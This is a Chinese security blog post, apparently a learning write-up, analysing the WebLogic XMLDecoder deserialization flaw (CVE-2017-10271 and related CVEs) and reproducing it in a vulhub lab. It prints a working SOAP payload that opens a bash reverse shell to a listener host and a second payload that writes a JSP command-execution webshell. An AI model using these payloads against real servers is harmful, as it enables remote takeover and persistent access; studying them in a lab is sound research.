首页 > 其他分享 >WebLogic XMLDecoder反序列化漏洞

WebLogic XMLDecoder反序列化漏洞

时间:2024-06-10 11:57:25浏览次数:22  
标签:序列化 标签 漏洞 XMLDecoder WebLogic 解析 CVE

目录

前言

上篇复现了T3反序列化漏洞,XMLDecoder反序列化在WebLogic中也是一类影响很大的反序化漏洞。

XMLDecoder概述

XMLDecoder是JDK自带的以SAX方式解析xml的类,实现java对象和xml文件之间的转化。其中序列化过程是将java对象转换成xml文件,反序列化就是把特定格式的xml文件转换成java对象。

XMLDecoder基于SAX解析,从头到尾逐行逐个元素读取内容,拿到节点、属性、值之后通过Expression创建对象及调用方法。

XMLDecoder反序列化漏洞

我们可以先构造一个特殊的xml文件,让XMLDecoder去解析一下:

<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0"><string>calc</string></void>
        </array>
        <void method="start"/>
    </object>
</java>

image

使用XMLDecoder去反序列化xml数据,可以看到数据中包含的命令会被执行,弹了个计算器。反序列化后的执行代码类似于new ProcessBuilder(cmd).start();这样。


所以我们试着在ProcessBuilder的start方法打个断点,大致看一下调用栈的流程(jdk1.8.0_221):

image

首先直接去到XMLDocumentFragmentScannerImpl类的scanDocument方法,其中会通过循环迭代的方式解析,解析逻辑在next方法里面,next方法会逐行的去解析xml。

image

其具体的解析方式依赖于DocumentHandler类,在DocumentHandler构造函数中为不同的标签定义了不同的handler,每个handler都以key-value的形式存储,每个标签可以通过节点名称来获取对应的handler。

image

其中会调用回调方法进行相应事件处理,比如startElement和endElement会在每当遇到起始或终止标签时调用。在startElement方法中首先解析java标签,从构造方法中HashMap取出对应的值,然后设置Owner和Parent。

image

之后去解析下一个object标签,拿到属性之后通过addAttribute设置属性。

image

其中调用了父类的addAttribute方法。

image

然后通过反射的方式生成了java.lang.ProcessBuilderClass对象。

image

赋值完之后跳出循环进入this.handler.startElement就这样依次解析下面的标签。解析完所有的开始标签之后,进入到endElement开始解析闭合标签。

image

然后调用ElementHandler类的getValueObject获取标签内的value值。

image

经过多次的handler的getValueObject调用,标签都闭合之后,最终去调用ObjectElementhandler的getValueObject方法。

image

最终得到的var3的值为java.lang.ProcessBuilder,var4的值为start,再通过Expression的var5的getValue方法反射调用start触发命令执行。

其实最后相当于最后拼接了这样一个表达式:

new java.lang.ProcessBuilder(new String[]{"calc"}).start();

水平有限这里只是大概走了个流程,详细过程可参考:https://www.cnblogs.com/LittleHann/p/17814641.html

总之,XMLDecoder导致漏洞的原因就是在于这些handler处理节点的时候,对外部输入的XML指定节点类型信息没有做限制,同时在进行节点实例化的时候允许节点属性由XML任意控制,最终再由Java反射特性实现了代码执行。


WebLogic XMLDecoder反序列化漏洞的原因在于,Weblogic的WLS Security组件对外提供webservice服务,其中就使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,最终导致可执行任意命令。

如果对WebLogic XMLDecoder反序列化更深入的了解的话,可以IDEA远程调试Weblogic,根据复现爆出的调用栈进行跟踪调试。

可参考这篇文章:https://shu1l.github.io/2021/02/09/weblogic-xmldecoder-fan-xu-lie-hua-lou-dong-xue-xi/#动态调试

有关WebLogic的XMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271、CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,差异主要在于出问题的包、黑名单过滤的标签。

漏洞复现

这里用vulhub靶场的CVE-2017-10271漏洞环境进行复现XMLDecoder反序列化漏洞远程命令执行。

影响版本:Weblogic < 10.3.6

环境搭建:

cd ./vulhub/weblogic/CVE-2017-10271
docker compose up -d

访问这些目录手动检测:

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

浏览器访问/wls-wsat/CoordinatorPortType路径,出现下图就说明大可能存在漏洞:

image

使用Burp拦截请求页面,请求方法改为POST,添加如下header字段,其中Content-Length为Payload的长度:

Content-Type: text/xml
Content-Length: 640

image

POST的Payload如下:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.88.150/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

简单解释一下Payload的构造原理:

开头和末尾的几个标签主要是SOAP的协议规范,java标签中的是恶意的XML数据。XMLDecoder对象包含一个rocessBuilder对象用来构建一个指定命令的进程,执行一个反弹shell的命令。

整个XML反序列化后相当于执行代码:

String[] cmd = new String[3];
cmd[0] = "/bin/bash";
cmd[1] = "-c";
cmd[2] = "bash -i >& /dev/tcp/192.168.88.150/8888 0>&1";
new ProcessBuilder(cmd).start();

监听本机的8888端口收到shell:

image

POST如下Payload可以写入webshell:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter">
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/bbb.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream(); int a = -1; byte[] b = new byte[2048];  while((a=in.read(b))!=-1){ out.println(new String(b)); } %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope

执行命令:

image

从整个XMLDecoder反序列化漏洞的来看(CVE-2017-3506 -> CVE-2017-10271 -> CVE-2019-2725 -> CVE-2019-2729),漏洞原理都是相似,主要是针对黑名单修补丁的绕过。

补丁分析:https://xz.aliyun.com/t/8465?time__1311=n4%2BxuDgDBDyDnDfhYxlxGhb78PxrCQDj24rD&alichlgref=https%3A%2F%2Fcn.bing.com%2F#toc-7

参考文章:
https://www.cnblogs.com/LittleHann/p/17814641.html
https://vulhub.org/#/environments/weblogic/CVE-2017-10271/
https://zhuanlan.zhihu.com/p/108754274


若有错误,欢迎指正!o( ̄▽ ̄)ブ

标签:序列化,标签,漏洞,XMLDecoder,WebLogic,解析,CVE
From: https://www.cnblogs.com/smileleooo/p/18237569

相关文章

  • Django API开发实战:前后端分离、Restful风格与DRF序列化器详解
    系列文章目录Django入门全攻略:从零搭建你的第一个Web项目DjangoORM入门指南:从概念到实践,掌握模型创建、迁移与视图操作DjangoORM实战:模型字段与元选项配置,以及链式过滤与QF查询详解DjangoORM深度游:探索多对一、一对一与多对多数据关系的奥秘与实践跨域问题与Django解决......
  • moectf2019 Object 反序列化
    今天来个反序列化,看源码。点击查看代码<?phperror_reporting(0);//flag在flag.php里classflag{public$cmd='index.php';publicfunction__destruct(){if(preg_match('/\w+\((?R)?\)/',$this->cmd)){eval('$a=&qu......
  • 深入理解序列化:概念、应用与技术
    在计算机科学中,序列化(Serialization)是指将数据结构或对象状态转换为可存储或传输的格式的过程。这个过程允许将数据保存到文件、内存缓冲区,或通过网络传输至其他计算机环境,不受原始程序语言的限制。相对地,反序列化(Deserialization)则是将这种格式变回原来的数据结构或对象的......
  • python: 如何将方法对象和类实例对象序列化
    文章目录1.Json序列化2.Pickle序列化1.Json序列化在python中对于一般数据的序列化保存经常使用的就是json序列化json序列化可序列的对象:一般数据类型列表,字典,字符串,数字,布尔值,None等json可以序列化的对象类型: 基本数据类型: None 布尔值:True,False 数......
  • C# 使用Newtonsoft.Json的JsonProperty设置返回的Json数据列名/C# 通过实体类序列化生
    原文链接:https://blog.csdn.net/weixin_44917045/article/details/103236167         https://blog.csdn.net/bazinga_y/article/details/134416680在写分页的时候,返回Json数据给前台的时候,数据不能出来,原因就是Json数据的列名是大写的,而页面需要的是小写的。......
  • 序列化器(Serializers)踩坑记录
    1、data数据不能加'.values()'deflistParticulars(self,request,*args,**kwargs):particulars=xmind_particulars.objects.all()#不能加values()serializer=ParticularsSerializer(particulars,many=True)returnAPIRespones('......
  • Centos7下安装weblogic
    一、Weblogic安装包下载Weblogic下载地址:https://www.oracle.com/cn/middleware/technologies/fusionmiddleware-downloads.html 二、安装JDKWeblogic需要依赖于JDK#解压jdk压缩包,将文件夹重命名为jdk1.8tarzxfjdk-8-linux-x64.tar.gz-C/opt/cd/optmvjdk1.8......
  • weblogic使用过程中的部分报错与解决方案
     引用:https://www.cnblogs.com/jeff-z-blog/p/9534591.html报错一:vim中E212:无法打开并写入文件编写配置文件时,常常忘记切换到root用户,导致文件编辑完毕,敲入:wq退出保存时,出现E212:无法打开并写入文件的错误提示。这是由于在该目录下当前用户没有写权限导致,修改该文件的权限即......
  • 实体类为啥要序列化
     实体类实现Serializable的作用作用:第一个是便于存储,第二个是便于传输Serializable,之前一直有使用,默认的实体类就会实现Serializable接口,对具体原因一直不是很了解,同时如果没有实现序列化,同样没什么影响,什么时候应该进行序列化操作呢?今天查了下资料,大致总结一下。1、其实......
  • android gson 扩展, 序列化int类型被转double 问题
    importcom.google.gson.Gsonimportcom.google.gson.GsonBuilderimportcom.google.gson.ToNumberStrategyimportcom.google.gson.reflect.TypeTokenimportcom.google.gson.stream.JsonReaderimportjava.io.IOExceptionimportjava.lang.reflect.Typeimportjava.m......